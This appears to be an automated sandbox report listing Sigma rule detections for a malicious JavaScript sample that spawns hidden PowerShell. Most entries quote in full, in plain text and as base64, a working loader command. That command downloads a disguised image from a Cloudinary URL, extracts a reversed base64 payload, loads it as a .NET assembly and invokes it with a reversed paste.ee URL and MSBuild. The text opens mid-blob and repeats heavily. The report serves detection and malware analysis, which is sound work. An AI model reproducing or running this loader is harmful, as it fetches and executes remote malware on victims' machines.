QBzAGUALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAYwBvAG4AdABlAG4AaABvACwAIAAkAHEAdQBpAG4AYQBsACkAOwAkAGIAdQBiAGUAbABhACAAPQAgAC0AagBvAGkAbgAgACgAJABhAGwAbQBlAGkAZABpAG4AYQAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAYQBsAG0AZQBpAGQAaQBuAGEALgBMAGUAbgBnAHQAaAApAF0AOwAkAGEAZABqAHUAdABvAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgB1AGIAZQBsAGEAKQA7ACQAcABhAGQAcgBhAHMAdABvACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGEAZABqAHUAdABvAHIAKQA7ACQAbQ
                  Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$madrigalete = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$relatar = New-Object System.Net.WebClient;$adro = $relatar.DownloadData($madrigalete);$oftalmoxise = [System.Text.Encoding]::UTF8.GetString($adro);$xaqueca = '<<BASE64_START>>';$brim = '<<BASE64_END>>';$contenho = $oftalmoxise.IndexOf($xaqueca);$colapso = $oftalmoxise.IndexOf($brim);$contenho -ge 0 -and $colapso -gt $contenho;$contenho += $xaqueca.Length;$quinal = $colapso - $contenho;$almeidina = $oftalmoxise.Substring($contenho, $quinal);$bubela = -join ($almeidina.ToCharArray() | ForEach-Object { $_ })[-1..-($almeidina.Length)];$adjutor = [System.Convert]::FromBase64String($bubela);$padrasto = [System.Reflection.Assembly]::Load($adjutor);$manducar = [dnlib.IO.Home].GetMethod('VAI');$manducar.Invoke($null, @('0/VAfz5/r/ee.etsap//:sptth', 'symposiarcha', 'symposiarcha', 'symposiarcha', 'MSBuild', 'symposiarcha', 'symposiarcha','symposiarcha','symposiarcha','symposiarcha','symposiarcha','symposiarcha','1','symposiarcha'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$madrigalete = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$relatar = New-Object System.Net.WebClient;$adro = $relatar.DownloadData($madrigalete);$oftalmoxise = [System.Text.Encoding]::UTF8.GetString($adro);$xaqueca = '<<BASE64_START>>';$brim = '<<BASE64_END>>';$contenho = $oftalmoxise.IndexOf($xaqueca);$colapso = $oftalmoxise.IndexOf($brim);$contenho -ge 0 -and $colapso -gt $contenho;$contenho += $xaqueca.Length;$quinal = $colapso - $contenho;$almeidina = $oftalmoxise.Substring($contenho, $quinal);$bubela = -join ($almeidina.ToCharArray() | ForEach-Object { $_ })[-1..-($almeidina.Length)];$adjutor = [System.Convert]::FromBase64Strin
                  Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $zooiatrologia = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGEAZAByAGkAZwBhAGwAZQB0AGUAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJAByAGUAbABhAHQAYQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEAZAByAG8AIAA9ACAAJAByAGUAbABhAHQAYQByAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AYQBkAHIAaQBnAGEAbABlAHQAZQApADsAJABvAGYAdABhAGwAbQBvAHgAaQBzAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABhAGQAcgBvACkAOwAkAHgAYQBxAHUAZQBjAGEAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGIAcgBpAG0AIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAYwBvAG4AdABlAG4AaABvACAAPQAgACQAbwBmAHQAYQBsAG0AbwB4AGkAcwBlAC4ASQBuAGQAZQB4AE8AZgAoACQAeABhAHEAdQBlAGMAYQApADsAJABjAG8AbABhAHAAcwBvACAAPQAgACQAbwBmAHQAYQBsAG0AbwB4AGkAcwBlAC4ASQBuAGQAZQB4AE8AZgAoACQAYgByAGkAbQApADsAJABjAG8AbgB0AGUAbgBoAG8AIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABjAG8AbABhAHAAcwBvACAALQBnAHQAIAAkAGMAbwBuAHQAZQBuAGgAbwA7ACQAYwBvAG4AdABlAG4AaABvACAAKwA9ACAAJAB4AGEAcQB1AGUAYwBhAC4ATABlAG4AZwB0AGgAOwAkAHEAdQBpAG4AYQBsACAAPQAgACQAYwBvAGwAYQBwAHMAbwAgAC0AIAAkAGMAbwBuAHQAZQBuAGgAbwA7ACQAYQBsAG0AZQBpAGQAaQBuAGEAIAA9ACAAJABvAGYAdABhAGwAbQBvAHgAaQBzAGUALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAYwBvAG4AdABlAG4AaABvACwAIAAkAHEAdQBpAG4AYQBsACkAOwAkAGIAdQBiAGUAbABhACAAPQAgAC0AagBvAGkAbgAgACgAJABhAGwAbQBlAGkAZABpAG4AYQAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAYQBsAG0AZQBpAGQAaQBuAGEALgBMAGUAbgBnAHQAaAApAF0AOwAkAGEAZABqAHUAdABvAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgB1AGIAZQBsAGEAKQA7ACQAcABhAGQAcgBhAHMAdABvACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGEAZABqAHUAdABvAHIAKQA7ACQAbQ
                  Sigma detected: Script Initiated Connection to Non-Local Network
                  Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 104.21.84.67, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7296, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                  Sigma detected: Script Interpreter Execution From Suspicious Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Local\Temp\ostaxa.js, CommandLine: "C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Local\Temp\ostaxa.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1013911.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7296, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Local\Temp\ostaxa.js, ProcessId: 7384, ProcessName: cscript.exe
                  Sigma detected: Suspicious Script Execution From Temp Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Local\Temp\ostaxa.js, CommandLine: "C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Local\Temp\ostaxa.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1013911.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7296, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Local\Temp\ostaxa.js, ProcessId: 7384, ProcessName: cscript.exe
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1013911.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1013911.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 8012, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1013911.js", ProcessId: 7296, ProcessName: wscript.exe
                  Sigma detected: WScript or CScript Dropper - File
                  Source: File createdAuthor: Tim Shelton: Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 7296, TargetFilename: C:\Users\user\AppData\Local\Temp\ostaxa.js
                  Sigma detected: Change PowerShell Policies to an Insecure Level
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $zooiatrologia = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGEAZAByAGkAZwBhAGwAZQB0AGUAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJAByAGUAbABhAHQAYQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEAZAByAG8AIAA9ACAAJAByAGUAbABhAHQAYQByAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AYQBkAHIAaQBnAGEAbABlAHQAZQApADsAJABvAGYAdABhAGwAbQBvAHgAaQBzAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABhAGQAcgBvACkAOwAkAHgAYQBxAHUAZQBjAGEAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGIAcgBpAG0AIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAYwBvAG4AdABlAG4AaABvACAAPQAgACQAbwBmAHQAYQBsAG0AbwB4AGkAcwBlAC4ASQBuAGQAZQB4AE8AZgAoACQAeABhAHEAdQBlAGMAYQApADsAJABjAG8AbABhAHAAcwBvACAAPQAgACQAbwBmAHQAYQBsAG0AbwB4AGkAcwBlAC4ASQBuAGQAZQB4AE8AZgAoACQAYgByAGkAbQApADsAJABjAG8AbgB0AGUAbgBoAG8AIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABjAG8AbABhAHAAcwBvACAALQBnAHQAIAAkAGMAbwBuAHQAZQBuAGgAbwA7ACQAYwBvAG4AdABlAG4AaABvACAAKwA9ACAAJAB4AGEAcQB1AGUAYwBhAC4ATABlAG4AZwB0AGgAOwAkAHEAdQBpAG4AYQBsACAAPQAgACQAYwBvAGwAYQBwAHMAbwAgAC0AIAAkAGMAbwBuAHQAZQBuAGgAbwA7ACQAYQBsAG0AZQBpAGQAaQBuAGEAIAA9ACAAJABvAGYAdABhAGwAbQBvAHgAaQBzAGUALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAYwBvAG4AdABlAG4AaABvACwAIAAkAHEAdQBpAG4AYQBsACkAOwAkAGIAdQBiAGUAbABhACAAPQAgAC0AagBvAGkAbgAgACgAJABhAGwAbQBlAGkAZABpAG4AYQAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAYQBsAG0AZQBpAGQAaQBuAGEALgBMAGUAbgBnAHQAaAApAF0AOwAkAGEAZABqAHUAdABvAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgB1AGIAZQBsAGEAKQA7ACQAcABhAGQAcgBhAHMAdABvACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGEAZABqAHUAdABvAHIAKQA7ACQAbQ
                  Sigma detected: Script Initiated Connection
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.21.84.67, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7296, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                  Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$madrigalete = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$relatar = New-Object System.Net.WebClient;$adro = $relatar.DownloadData($madrigalete);$oftalmoxise = [System.Text.Encoding]::UTF8.GetString($adro);$xaqueca = '<<BASE64_START>>';$brim = '<<BASE64_END>>';$contenho = $oftalmoxise.IndexOf($xaqueca);$colapso = $oftalmoxise.IndexOf($brim);$contenho -ge 0 -and $colapso -gt $contenho;$contenho += $xaqueca.Length;$quinal = $colapso - $contenho;$almeidina = $oftalmoxise.Substring($contenho, $quinal);$bubela = -join ($almeidina.ToCharArray() | ForEach-Object { $_ })[-1..-($almeidina.Length)];$adjutor = [System.Convert]::FromBase64String($bubela);$padrasto = [System.Reflection.Assembly]::Load($adjutor);$manducar = [dnlib.IO.Home].GetMethod('VAI');$manducar.Invoke($null, @('0/VAfz5/r/ee.etsap//:sptth', 'symposiarcha', 'symposiarcha', 'symposiarcha', 'MSBuild', 'symposiarcha', 'symposiarcha','symposiarcha','symposiarcha','symposiarcha','symposiarcha','symposiarcha','1','symposiarcha'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$madrigalete = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$relatar = New-Object System.Net.WebClient;$adro = $relatar.DownloadData($madrigalete);$oftalmoxise = [System.Text.Encoding]::UTF8.GetString($adro);$xaqueca = '<<BASE64_START>>';$brim = '<<BASE64_END>>';$contenho = $oftalmoxise.IndexOf($xaqueca);$colapso = $oftalmoxise.IndexOf($brim);$contenho -ge 0 -and $colapso -gt $contenho;$contenho += $xaqueca.Length;$quinal = $colapso - $contenho;$almeidina = $oftalmoxise.Substring($contenho, $quinal);$bubela = -join ($almeidina.ToCharArray() | ForEach-Object { $_ })[-1..-($almeidina.Length)];$adjutor = [System.Convert]::FromBase64Strin
                  Sigma detected: Usage Of Web Request Commands And Cmdlets
                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$madrigalete = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$relatar = New-Object System.Net.WebClient;$adro = $relatar.DownloadData($madrigalete);$oftalmoxise = [System.Text.Encoding]::UTF8.GetString($adro);$xaqueca = '<<BASE64_START>>';$brim = '<<BASE64_END>>';$contenho = $oftalmoxise.IndexOf($xaqueca);$colapso = $oftalmoxise.IndexOf($brim);$contenho -ge 0 -and $colapso -gt $contenho;$contenho += $xaqueca.Length;$quinal = $colapso - $contenho;$almeidina = $oftalmoxise.Substring($contenho, $quinal);$bubela = -join ($almeidina.ToCharArray() | ForEach-Object { $_ })[-1..-($almeidina.Length)];$adjutor = [System.Convert]::FromBase64String($bubela);$padrasto = [System.Reflection.Assembly]::Load($adjutor);$manducar = [dnlib.IO.Home].GetMethod('VAI');$manducar.Invoke($null, @('0/VAfz5/r/ee.etsap//:sptth', 'symposiarcha', 'symposiarcha', 'symposiarcha', 'MSBuild', 'symposiarcha', 'symposiarcha','symposiarcha','symposiarcha','symposiarcha','symposiarcha','symposiarcha','1','symposiarcha'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$madrigalete = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$relatar = New-Object System.Net.WebClient;$adro = $relatar.DownloadData($madrigalete);$oftalmoxise = [System.Text.Encoding]::UTF8.GetString($adro);$xaqueca = '<<BASE64_START>>';$brim = '<<BASE64_END>>';$contenho = $oftalmoxise.IndexOf($xaqueca);$colapso = $oftalmoxise.IndexOf($brim);$contenho -ge 0 -and $colapso -gt $contenho;$contenho += $xaqueca.Length;$quinal = $colapso - $contenho;$almeidina = $oftalmoxise.Substring($contenho, $quinal);$bubela = -join ($almeidina.ToCharArray() | ForEach-Object { $_ })[-1..-($almeidina.Length)];$adjutor = [System.Convert]::FromBase64Strin
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1013911.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1013911.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 8012, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1013911.js", ProcessId: 7296, ProcessName: wscript.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $zooiatrologia = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGEAZAByAGkAZwBhAGwAZQB0AGUAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJAByAGUAbABhAHQAYQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEAZAByAG8AIAA9ACAAJAByAGUAbABhAHQAYQByAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AYQBkAHIAaQBnAGEAbABlAHQAZQApADsAJABvAGYAdABhAGwAbQBvAHgAaQBzAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABhAGQAcgBvACkAOwAkAHgAYQBxAHUAZQBjAGEAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGIAcgBpAG0AIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAYwBvAG4AdABlAG4AaABvACAAPQAgACQAbwBmAHQAYQBsAG0AbwB4AGkAcwBlAC4ASQBuAGQAZQB4AE8AZgAoACQAeABhAHEAdQBlAGMAYQApADsAJABjAG8AbABhAHAAcwBvACAAPQAgACQAbwBmAHQAYQBsAG0AbwB4AGkAcwBlAC4ASQBuAGQAZQB4AE